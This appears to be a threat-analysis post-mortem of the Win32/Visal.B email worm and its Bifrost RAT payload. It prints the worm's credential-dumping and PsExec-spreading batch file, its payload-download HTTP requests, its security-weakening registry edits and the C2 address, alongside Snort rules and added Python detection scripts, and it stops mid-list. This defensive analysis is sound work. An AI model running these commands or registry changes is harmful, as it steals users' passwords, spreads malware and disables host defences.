Threat Analysis

Win32/Visal.B Email Worm Post-Mortem Analysis

  • Date: September 22, 2010
  • Author: SecureWorks' Counter Threat Unit™

Summary

On September 9, 2010, the SecureWorks Counter Threat Unit™ (CTU) received reports of a possible worm propagating through email messages. These messages were reported to have the subject "Here you have" and contained links to download what appeared to be a PDF (Portable Document Format) file. In actuality, the link downloaded a Windows executable. This file was commonly identified (29/43) by antivirus vendors as Win32/Visal.B, W32/Imsolk.B, and W32/VBMania. This report presents a post-mortem analysis of a computer infected with this threat, to help organizations identify compromised assets and assess damages.

Email Characteristics

Figure 1 provides an example of what an email sent by this malware might look like.


Figure 1. Example Email.

The link shown in the message body is a decoy. The underlying hyperlink references a URL hosted on a free webhosting provider in the United Kingdom (UK), and the file it points to has an ".scr" extension, which is typically used by Microsoft Windows screen saver programs. An SCR file is a standard Microsoft Windows executable.

Sample Characteristics

CTU identified a single executable file as responsible for the initial infection; its characteristics are listed in Table 1.

MD5 2bde56d8fb2df4438192fb46cd0cc9c9
SHA1 0ba8387faaf158379712f453a16596d2d1c9cfdc
File Size 290816 bytes
File Type PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Table 1. Sample characteristics.

Win32 Visal.B Analysis

CTU analysis of this malware confirmed that its primary purpose was to download additional executables, spread itself to additional computers via email, Windows file shares, domain credentials, and USB autorun, and weaken the overall security posture of the computer.

Win32/Visal.B uses HTTP (Hypertext Transfer Protocol) to attempt to download and execute files from several links hosted on a free webhosting site run by Lycos UK. A typical HTTP request would look like:

 
GET /yahoophoto/ff.iq HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: members.multimania.co.uk
Connection: Keep-Alive

All of the requested URLs end with the .iq suffix. The downloaded executables are saved in the %systemroot% folder (e.g. c:\WINDOWS), with the .iq suffix changed to .exe. CTU analyzed the sample and correlated the results with findings from other security researchers to determine which files would be downloaded and installed on an infected computer. Table 2 shows the attributes of the downloaded files and of the additional files installed by the malware.

File Path MD5 Type Size (bytes)
c:\WINDOWS\csrss.exe 2bde56d8fb2df4438192fb46cd0cc9c9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 290816
c:\WINDOWS\op.exe 37a89021ab1fbe5668c3974abc794bd4 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 39424
c:\WINDOWS\pspv.exe 35861f4ea9a8ecb6c357bdb91b7df804 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 52736
c:\WINDOWS\tryme1.exe 7dac073c9966dec34c523f95f7ec07a9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 57970
c:\WINDOWS\ff.exe ac5808334832032b0e7df1a2351e207f PE32 executable for MS Windows (GUI) Intel 80386 32-bit 38400
c:\WINDOWS\gc.exe 9b3b1c0db965166319469b2afa6c4f0c PE32 executable for MS Windows (GUI) Intel 80386 32-bit 128000
c:\WINDOWS\ie.exe 21e55f6bbe6bd753faf348dc12e38353 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 44032
c:\WINDOWS\im.exe 4b0f8add6c696cefe2746b6372a09034 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 65536
c:\WINDOWS\m.exe 60e5a03029eac3972550507e96ee4b83 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 51200
c:\WINDOWS\w.exe 862dfc205db452c3c5127b1c721ec1a8 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 48128
c:\WINDOWS\rd.exe f3ca95a762a4101a2cd5789190681a78 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 33280
c:\WINDOWS\re.exe 52f29041d8d151964e904a8d4d0e2677 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 129400
c:\WINDOWS\system32\drivers\etc\hosts fe1f2ddf56663e55ea5a6c48c4660908 Data 44981
c:\WINDOWS\vb.vbs e9552b3f2a5da01805015669fe9b7091 ASCII text, with CRLF line terminators 1728
c:\WINDOWS\system32\SendEmail.dll 6af5491540b35ea502aadde3a358e2c9 PE32 executable for MS Windows (DLL) Intel 80386 32-bit 309992
c:\autorun.inf 323d9773a5dc9efb4623abd1e5c78ce1 ASCII text, with CRLF line terminators 167
c:\open.exe 2bde56d8fb2df4438192fb46cd0cc9c9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 290816

Table 2. List of files downloaded by Win32/Visal.B.

File Analysis

Most of the downloaded programs have been identified as password recovery tools for specific web browser and email client programs. Developed by NirSoft, a freeware web site operated by an individual software developer, these tools are promoted as utilities to recover lost or forgotten passwords and are not typically considered malicious by themselves. None of these tools analyzed by CTU had the ability to exfiltrate data via the network. However, many of these tools do provide the means to produce output to files. Win32/Visal.B attempts to create and execute a batch file named b.bat. This batch file runs these downloaded programs with a command line option to send the output to a text file. Win32/Visal.B will then attempt to email the output files to an email address hardcoded in the malware.

Contents of b.bat:

 
ff.exe /stext "C:\WINDOWS\ff.dlm"
gc.exe /stext "C:\WINDOWS\gc.dlm"
ie.exe /stext "C:\WINDOWS\ie.dlm"
im.exe /stext "C:\WINDOWS\im.dlm"
op.exe /stext "C:\WINDOWS\op.dlm"
pspv.exe /stext "C:\WINDOWS\pspv.dlm"
rd.exe /stext "C:\WINDOWS\rd.dlm"
w.exe /stext "C:\WINDOWS\w.dlm"
m.exe /stext "C:\WINDOWS\m.dlm"
del *.exe
Copy /b /y SendEmail.dll %SystemRoot%\System32\*.*
regsvr32 %SystemRoot%\System32\SendEmail.dll
re.exe \\* -c \\INFECTEDCOMP\updates\updates.exe

The re.exe tool has been identified as PsExec, a utility distributed by Microsoft's SysInternals group for running applications on remote systems. INFECTEDCOMP is the name of the infected computer, and "updates" is the name of a network share that the malware attempts to create and copy itself to. If the logged-in user had administrator credentials for the domain, these permissions could allow the malware to spread to every computer in the domain.

Table 3 maps the observed password recovery utilities downloaded by Win32/Visal.B to the corresponding NirSoft utility.

File Name Tool Name Client Location
ie.exe IE PassView Internet Explorer http://www.nirsoft.net/utils/internet_explorer_password.html
ff.exe PasswordFox Firefox http://www.nirsoft.net/utils/passwordfox.html
op.exe OperaPassView Opera http://www.nirsoft.net/utils/opera_password_recovery.html
pspv.exe Protected Storage PassView Microsoft Protected Storage http://www.nirsoft.net/utils/pspv.html
im.exe MessenPass MSN Messenger/Yahoo Messenger/GoogleTalk/AOL IM/other IM clients http://www.nirsoft.net/utils/mspass.html
m.exe Mail Passview Outlook/Outlook Express/Eudora/Thunderbird/other email clients http://www.nirsoft.net/utils/mailpv.html
w.exe WirelessKeyView WEP/WPA passwords http://www.nirsoft.net/utils/wireless_key.html
gc.exe ChromePass Google Chrome http://www.nirsoft.net/utils/chromepass.html
rd.exe Remote Desktop PassView Microsoft Remote Desktop http://www.nirsoft.net/utils/remote_desktop_password.html

Table 3. Inventory of password recovery utilities.

csrss.exe

This file is a copy of the original Win32/Visal.B executable. The malware may copy itself to several other directories in its attempt to spread via USB autorun and Windows file shares (e.g. c:\open.exe).

Additionally, Win32/Visal.B may create copies of itself in various directories with the pattern " CV 2010.exe".

hosts

Win32/Visal.B attempts to download the hst.iq file, intended as a replacement for the Windows local hosts file. Windows consults the local hosts file to resolve domain names to IP addresses before querying DNS. This version of the hosts file attempts to force domains belonging to several antivirus and antimalware products to resolve to bogus IP addresses. If successful, these tools could be prevented from contacting their update sites to receive updated signatures.
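One way to check a recovered hosts file for this kind of tampering, as an added example that is not part of the original report (the sample hosts content and the WATCHED_SUFFIXES list are constructed placeholders an analyst would replace with their own vendors' update domains):

```python
"""Check a Windows hosts file for the tampering this report describes: entries
that force antivirus and antimalware update domains to resolve to bogus
addresses. Added example, not part of the original report. The sample hosts
content is constructed, and WATCHED_SUFFIXES is a placeholder list an analyst
would replace with the vendor domains deployed in their environment."""
import ipaddress

# Names a stock Windows hosts file may legitimately map to loopback.
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}
# Assumed watch-list of update domains (placeholders, not real vendor names).
WATCHED_SUFFIXES = ("example-av.test", "example-antimalware.test")


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs; a line may list several names."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                           # not an address, skip the line
        for name in fields[1:]:
            yield ip, name.lower()


def find_tampering(text):
    """Return (hostname, ip, reason) for every mapping worth a look."""
    findings = []
    for ip, name in parse_hosts(text):
        if name in DEFAULT_NAMES and ip.is_loopback:
            continue                           # stock entry
        if name.endswith(WATCHED_SUFFIXES):
            reason = "security vendor domain pinned in hosts"
        elif ip.is_loopback or ip.is_unspecified:
            reason = "name sinkholed to a local address"
        else:
            reason = "non-default static mapping"
        findings.append((name, str(ip), reason))
    return findings


# Constructed sample: stock entries followed by tampered ones.
SAMPLE_HOSTS = """\
# stock entries
127.0.0.1       localhost
::1             localhost
# tampered entries (constructed for this example)
127.0.0.1       update.example-av.test liveupdate.example-av.test
0.0.0.0         download.example-antimalware.test
192.0.2.10      intranet.corp.test   # unrelated static mapping, still reported
"""

if __name__ == "__main__":
    for name, ip, reason in find_tampering(SAMPLE_HOSTS):
        print(f"{ip:<12} {name:<40} {reason}")
```

On a default Windows installation every mapping other than the localhost entries deserves a look, which is why the script reports non-watched static entries as well.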

SendEmail.dll

This is an email sending module used by Win32/Visal.B to send emails. This DLL (Dynamic Link Library) is a publicly available module from http://www.4shared.com/file/199140856/ed929f06/SendEmail20.html. The b.bat file created and executed by Win32/Visal.B copies this DLL into the %SystemRoot%\System32 folder and calls regsvr32 to register it.

vb.vbs

This is a VBScript file that is dropped and executed by the malware in an attempt to copy itself to all remote computers within WinNT://Workgroup. CTU analysis of this file shows that it may not function correctly. If it did, it would attempt to copy the malware to the following paths:

 
\d\N73.Image12.03.2009.JPG.scr
\c\N73.Image12.03.2009.JPG.scr
\New Folder\N73.Image12.03.2009.JPG.scr
\music\N73.Image12.03.2009.JPG.scr
\print\N73.Image12.03.2009.JPG.scr
\E\N73.Image12.03.2009.JPG.scr
\F\N73.Image12.03.2009.JPG.scr
\G\N73.Image12.03.2009.JPG.scr
\H\N73.Image12.03.2009.JPG.scr

autorun.inf

Autorun file used to spread the infection via USB (Universal Serial Bus) and other removable devices.

tryme1.exe

CTU analysis of this file shows that it is a version of a Remote Access Trojan (RAT) known as Bifrost. This version of Bifrost is currently detected by most (40/42) antivirus vendors. See the 'Bifrost Analysis' section later in this paper for more information.

Win32/Visal.B Registry Activity

Win32/Visal.B attempts to change the Windows Shell registry setting to force itself to start at each login.

Key Value Data
HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Explorer.exe C:\WINDOWS\csrss.exe

Table 4. Registry changes for Win32/Visal.B startup.

Win32/Visal.B also attempts to add several registry key entries in an attempt to lower the security posture of an infected computer.

Disable Windows Firewall:

Key Value Data
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile EnableFirewall 0

Table 5. Registry changes to disable Windows Firewall.

Win32/Visal.B adds the following registry entries to allow SMB (Server Message Block) traffic. SMB, often known as "Windows Networking", provides shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.

Key Value Data
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 137:UDP 137:UDP:*:Enabled:@xpsp2res.dll,-22001
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 138:UDP 138:UDP:*:Enabled:@xpsp2res.dll,-22002
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 139:TCP 139:TCP:*:Enabled:@xpsp2res.dll,-22004
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 445:TCP 445:TCP:*:Enabled:@xpsp2res.dll,-22005
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 137:UDP 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 138:UDP 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 139:TCP 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List 445:TCP 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005

Table 6. Registry additions to allow SMB traffic.

With these registry additions, Win32/Visal.B instructs Windows Explorer to not show hidden system files:

Key Value Data
HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden 2
HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced SuperHidden 0
HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden 0

Table 7. Registry additions to hide system files.

Turn off Outlook security warning dialog box:

Key Value Data
HKLM\software\Microsoft\Office\12.0\Outlook\Security ObjectModelGuard 2

Table 8. Registry additions to disable security warnings.

Disable Windows User Account Control (UAC):

Key Value Data
HKLM\software\Microsoft\Windows\CurrentVersion\policies\system EnableLUA 0
HKLM\software\Microsoft\Windows\CurrentVersion\policies\system EnableVirtualization 0
HKLM\software\Microsoft\Windows\CurrentVersion\policies\system PromptOnSecureDesktop 0

Table 9. Registry additions to disable Windows UAC.

Attempt to create a network share named "updates" to allow the malware to spread:

Key Value Data
HKLM\system\ControlSet001\Services\lanmanserver\Shares updates CSCFlags=0[0x00]MaxUses=100[0x00]Path=C:\WINDOWS\system[0x00]Permissions=0[0x00]Remark=Public share for update.[0x00]Type=0[0x00][0x00]

Table 10. Registry changes to create a network share.

Win32/Visal.B adds numerous values within the software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ registry key. For example:

Key Value Data
HKLM\software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com Debugger csrss.exe

Table 11. Example of a registry addition intended to inhibit security software.

This additional key causes a copy of the malware to be started instead of the application listed in the registry key (in this example, 00hoeav.com). Win32/Visal.B uses this technique to prevent program names matching various security applications from executing. Appendix A contains the full list of targeted applications.
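A triage script for the registry changes in Tables 4 to 11, added here as an example rather than taken from the report: it parses a .reg export (only REG_SZ and REG_DWORD data are decoded), and SAMPLE_REG is constructed from the report's values, not captured from a real host.

```python
"""Triage a Windows registry export (.reg text) for the security-posture
changes this report attributes to Win32/Visal.B (Tables 4 to 11). Added
example, not part of the original report. The sample export below is
constructed from the report's values rather than taken from a real host, and
only REG_SZ and REG_DWORD data are decoded; other types stay as raw text."""
import re

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VAL_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
IFEO = (r"hkey_local_machine\software\microsoft\windows nt"
        r"\currentversion\image file execution options")


def parse_reg_export(text):
    """Return {key: {value_name: data}}; keys and value names lower-cased."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key").lower()
            reg.setdefault(key, {})
            continue
        m = VAL_RE.match(line)
        if m and key is not None:
            data = m.group("data")
            if data.startswith("dword:"):
                data = int(data[6:], 16)
            elif len(data) >= 2 and data[0] == data[-1] == '"':
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            reg[key][m.group("name").lower()] = data
    return reg


def find_visal_indicators(reg):
    """Return one finding string per registry change from the report."""
    def get(key, name):
        return reg.get(key.lower(), {}).get(name.lower())

    findings = []
    shell = get(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
                r"\CurrentVersion\Winlogon", "Shell")
    if shell is not None and shell.strip().lower() != "explorer.exe":
        findings.append(f"Winlogon Shell hijacked: {shell}")            # Table 4
    fw = get(r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess"
             r"\Parameters\FirewallPolicy\StandardProfile", "EnableFirewall")
    if fw == 0:
        findings.append("Windows Firewall disabled (EnableFirewall=0)")  # Table 5
    policy = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system"
    for name in ("EnableLUA", "EnableVirtualization", "PromptOnSecureDesktop"):
        if get(policy, name) == 0:
            findings.append(f"UAC weakened ({name}=0)")                  # Table 9
    for key, values in reg.items():
        if key.endswith(r"\outlook\security") and values.get("objectmodelguard") == 2:
            findings.append("Outlook object model guard disabled")       # Table 8
        if key.endswith(r"\services\lanmanserver\shares") and "updates" in values:
            findings.append("propagation share 'updates' defined")       # Table 10
        if key.startswith(IFEO + "\\") and "debugger" in values:
            target = key.rsplit("\\", 1)[1]                              # Table 11
            findings.append(f"IFEO Debugger hijack: {target} -> {values['debugger']}")
    return findings


def triage(reg_text):
    return find_visal_indicators(parse_reg_export(reg_text))


# Constructed .reg export reproducing the report's values (not a real capture).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe C:\\WINDOWS\\csrss.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA"=dword:00000000
"EnableVirtualization"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Outlook\Security]
"ObjectModelGuard"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\lanmanserver\Shares]
"updates"=hex(7):43,53,43,46,6c,61,67,73,3d,30,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com]
"Debugger"="csrss.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe]
"Debugger"="csrss.exe"
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_REG):
        print(finding)
```

Any IFEO Debugger value is reported because such entries are rare on a healthy workstation; the analyst then compares the target name against Appendix A.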

Additional Win32/Visal.B Behavior

The Win32/Visal.B malware attempts to terminate the following processes if they are currently running:

  • Usbguard.exe
  • CPE17AntiAutoruna.exe
  • outlook.exe

It will also attempt to delete files in these directories:

 
  • C:\Program Files\USB Disk Security\
  • D:\Program Files\USB Disk Security\

Win32/Visal.B attempts to stop and then disable several Windows services belonging to antivirus and other host-based security products. See Appendix B for the complete list.

Visal Email Worm History

The CTU has seen evidence of at least one earlier instance of this malware campaign. CTU found another sample, executed in its TRUMAN automated malware analysis system on August 5, 2010, that exhibited nearly identical behavior. Antivirus identification (40/43) of this malware identified it as Win32/Visal.A and Imsolk.

The primary difference in this version of the malware is that it uses a different web hosting account. Win32/Visal.A attempted to download its secondary payloads from an account named "iqreporters".

 
GET /iqreporters/ie.iq HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: members.multimania.co.uk
Connection: Keep-Alive

Bifrost Analysis

The Bifrost RAT (Remote Access Trojan) downloaded by Win32/Visal.B provides an attacker with the ability to remotely view and control several aspects of an infected system, including:

  • Browse filesystem
  • Create and remove directories
  • Search for files by pattern
  • Upload and download files
  • Execute files on remote system
  • View and kill running processes
  • Capture screenshots of the infected computer's desktop
  • Log user keystrokes
  • View and modify the Windows Registry
  • Manipulate an attached webcam
  • Open a remote shell to the infected computer to run additional commands
 

As is common with RATs, Bifrost uses a GUI that runs on an attacker's computer to view and manage infected computers. Figure 2 shows an example of a Bifrost management GUI (Graphical User Interface) with an infected computer connected.

Figure 2. Bifrost Management GUI.

Figure 3 shows the File Manager capability:

Figure 3. Bifrost File Manager.

This version of Bifrost also includes an additional module for stealing passwords from Microsoft Protected Storage (which provides applications with an interface to store user data that must be kept secure or free from modification) and from several email clients, and for stealing license keys from popular software packages and games.

Bifrost File Behavior

The Bifrost sample installed by Win32/Visal.B was observed making the following file changes:

File Path MD5 File Type Size (Bytes)
c:\Documents and Settings\owner\Application Data\addons.dat 902591674a0e7d0143418aab50977ff4 data 25292
c:\WINDOWS\system32\systems\logg.dat <variable> data <variable>
c:\WINDOWS\system32\systems\svchosts.exe 7dac073c9966dec34c523f95f7ec07a9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 57970

Table 12. File changes made by the Bifrost malware.

addons.dat

An encrypted module for Bifrost that implements the password and software license key stealing capability mentioned earlier in this section.

logg.dat

The log file Bifrost uses to store keystrokes collected by its keylogger capability. The keylogger functionality in this version of Bifrost was enabled by default.

svchosts.exe

The Bifrost trojan copies itself to this location the first time it executes.

Bifrost Registry Behavior

Bifrost makes the following registry changes:

Key Value Data
HKCU\Software\Bifrost klg [0x01]
HKCU\Software\Bifrost plg1 <binary data>
HKCU\software\Bifrost nck [0xe8][0x12][0xec]'[0xa4][0x05][0xc9]P[0x06][0xc3][0xcd]t[0xfa][0x93][g
software\Microsoft\Active Setup\Installed Components\{9D71D88C-C598-4935-C5D1-43AA4DB90836} stubpath C:\WINDOWS\system32\systems\svchosts.exe s[0x00]

Table 13. Registry additions made by the Bifrost malware.

Bifrost uses the stubpath entry to establish persistence on the infected computer. Programs listed under the Active Setup key are automatically executed at login. If the user initially running the Bifrost trojan has Administrator privileges, this key is written under HKEY_LOCAL_MACHINE and Bifrost will start up for all users. If the initial user does not have Administrator privileges, the key is written under HKEY_CURRENT_USER and Bifrost will only start up when that user logs in.

Bifrost Network Behavior

Bifrost uses a custom protocol to communicate with the GUI on the attacker's computer. This protocol is TCP-based and the remote host and port number can be custom configured for each build of the malware. The version dropped by Win32/Visal.B was configured to connect to the tarekbinziad.no-ip.biz domain on TCP port 2003. CTU observed this domain resolving to the IP address 92.41.61.61 before the domain was taken offline by the dynamic DNS provider.

Recent versions of Bifrost support the use of a TOR plugin and TOR hidden services to attempt to hide the remote server. TOR is free software used to communicate anonymously on the Internet. This version of Bifrost supports the TOR plugin but did not include it.

Bifrost Process Behavior

Bifrost supports various options and plugins for stealth, including rootkit capabilities. This build of Bifrost did not utilize these rootkit capabilities. Its primary stealth mechanism is to create an instance of an Internet Explorer process that is not visible, and then inject its primary code into that process. While there is no visible IE window, it will still be present in the Task Manager (see Figure 4).

Figure 4. Bifrost IE process in task list.

The powerful capabilities of the Bifrost trojan make it a significant threat on a network, as it allows an attacker almost full access to a compromised computer and the information stored within. A factor that may mitigate the threat in this instance is that the Bifrost GUI was not built to scale to a large number of infected computers. In addition, the attacker's use of a mobile broadband connection may have caused that connection's bandwidth to become saturated by the potentially large number of infected hosts attempting to connect to the control GUI. This constraint may have reduced the number of infected computers successfully connecting to the remote host and exfiltrating stolen data.

Recommendations

Detection

CTU recommends monitoring networks for activity indicative of Win32/Visal.B infection. There are various stages of the infection process where detection is possible.

Initial HTTP download request

The emails sent by Win32/Visal.B attempt to obfuscate the URL hosting the malware by displaying one of the following URLs in the HTML markup:

 
www[dot]sharedocuments[dot]com/library/PDF_Document21.025542010.pdf
www[dot]sharemovies[dot]com/library/SEX21.025542010.wmv

However, the hyperlink actually points to this URL:

 
http://members[dot]multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr

Network IPS/IDS and/or web proxies should be configured to detect and/or block attempts to download these URLs. The following Snort rules can be used to detect attempts to download either the actual URL hosting the malware, or one of the decoy URLs:

 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/library/SEX21.025542010.wmv|20|HTTP/1."; distance:0; sid:xxx;)
 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/yahoophoto/PDF_Document21_025542010_pdf.scr|20|HTTP/1."; distance:0; nocase; sid:xxx;)
 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/library/PDF_Document21.025542010.pdf|20|HTTP/1."; distance:0; nocase; sid:xxx;)

Post-Infection Malware Download

Win32/Visal.B attempts to download multiple executable files from the Internet. These requests have unique attributes that can be easily detected. The following Snort rule can be used:

 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Visal.B Email Worm Malware Download"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:".iq|20|HTTP/1.1"; distance:1; content:"|0D 0A|User-Agent|3A 20|Mozilla|2F|4.0|20 28|compatible|3B 20|Win32|3B 20|WinHttp.WinHttpRequest.5|29|"; distance:0; content:"|0D 0A|Accept|3A 20|*/*"; content:!"Referer|3A|"; nocase; content:!"|0D 0A|Accept-Language|3A|"; nocase; content:!"|0D 0A|Accept-Encoding|3A|"; nocase; content:!"|0D 0A|Accept-Charset|3A|"; nocase; content:!"|0D 0A|Keep-Alive|3A|"; nocase; sid:xxx;)
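The conditions the Snort rules above encode, restated as an added Python example (not code from the report) so they can be read and tested offline; the sample requests are constructed, the first mirroring the capture shown earlier in this paper:

```python
"""Classify raw HTTP requests against the Win32/Visal.B download fingerprint
described in this report: the initial .scr download (and its decoy links) and
the later .iq payload requests made through WinHttp. Added example, not part
of the original report; it restates the Snort rule conditions in Python so
they can be read and tested. Sample requests are constructed from the
report's captures."""

WORM_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
INITIAL_PATHS = {
    "/yahoophoto/PDF_Document21_025542010_pdf.scr",  # path actually hosting the file
    "/library/PDF_Document21.025542010.pdf",         # decoy paths shown in the email
    "/library/SEX21.025542010.wmv",
}
# Headers a browser normally sends but the worm's WinHttp client omits; the
# Snort rule expresses these as negated content matches.
BROWSER_ONLY = {"referer", "accept-language", "accept-encoding",
                "accept-charset", "keep-alive"}


def parse_request(raw):
    """Split a raw request into (method, path, version, headers); header names
    are lower-cased. Returns None when the request line is malformed."""
    lines = raw.replace("\r\n", "\n").split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], parts[2], headers


def classify(raw):
    """Return 'visal-initial', 'visal-payload', or None for a raw request."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, path, version, headers = parsed
    if method.upper() != "GET":
        return None
    if path in INITIAL_PATHS:
        return "visal-initial"
    # Payload fetch: ".iq HTTP/1.1", the fixed WinHttp User-Agent, "Accept: */*",
    # and none of the browser-only headers (the rule's content:! clauses).
    if (path.endswith(".iq") and version == "HTTP/1.1"
            and headers.get("user-agent") == WORM_UA
            and headers.get("accept") == "*/*"
            and BROWSER_ONLY.isdisjoint(headers)):
        return "visal-payload"
    return None


# Constructed samples; the first mirrors the request captured in the report.
WORM_REQUEST = (
    "GET /yahoophoto/ff.iq HTTP/1.1\r\n"
    "Accept: */*\r\n"
    f"User-Agent: {WORM_UA}\r\n"
    "Host: members.multimania.co.uk\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Same path and User-Agent, but with an Accept-Language header a browser adds.
BROWSER_LIKE_REQUEST = (
    "GET /yahoophoto/ff.iq HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-GB\r\n"
    f"User-Agent: {WORM_UA}\r\n"
    "Host: members.multimania.co.uk\r\n\r\n"
)
INITIAL_REQUEST = (
    "GET /yahoophoto/PDF_Document21_025542010_pdf.scr HTTP/1.1\r\n"
    "Host: members.multimania.co.uk\r\n\r\n"
)

if __name__ == "__main__":
    for req in (WORM_REQUEST, BROWSER_LIKE_REQUEST, INITIAL_REQUEST):
        print(req.split("\r\n")[0], "->", classify(req))
```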
 

Bifrost Phone Home

The Bifrost RAT installed by Win32/Visal.B attempts to phone home to a single host that is hardcoded in the malware. Organizations should monitor DNS activity for requests for the tarekbinziad.no-ip.biz domain that may indicate the system has been compromised with Win32/Visal.B and the Bifrost RAT. While that domain has been shut down, organizations with the ability to monitor their firewall logs can search for connection attempts to the IP address 92.41.61.61 on TCP/2003 to identify compromised systems.

Remediation

Win32/Visal.B can significantly alter the security posture of a compromised system, even if it is unsuccessful in downloading additional malware from the Internet. Given the magnitude of the registry and file changes made to the system, in addition to any additional malware installed, CTU recommends that compromised systems be formatted and the operating system and applications reinstalled from known-good media.

Organizations should also consider the potential compromise of any stored credentials for email and HTTP accounts and initiate appropriate remediation steps based on their risk calculations.

Prevention

In addition to network-based monitoring and detection, CTU recommends the following steps to help protect your organization from this and future threats.

  • Avoid clicking links in email messages.

    Advise users not to click links in email messages, especially in messages from unknown or untrusted sources. Note that users cannot determine whether an email link is safe simply by examining the link: web servers can be configured to redirect the user or to deliver content other than that indicated by the filename extension in the link. Verify links and attachments from trusted sources before opening them.

  • Disable AutoRun.

    If feasible, disable AutoRun functionality according to the instructions in Microsoft Knowledge Base article KB967715, available here:

    http://support.microsoft.com/kb/967715

  • Limit user privileges.

    Do not log in as a privileged or administrative user to perform routine computer tasks. The WMI (Windows Management Instrumentation) and psexec vectors used by this worm generally require administrator rights to work according to the attacker's design.

  • Secure WMI.

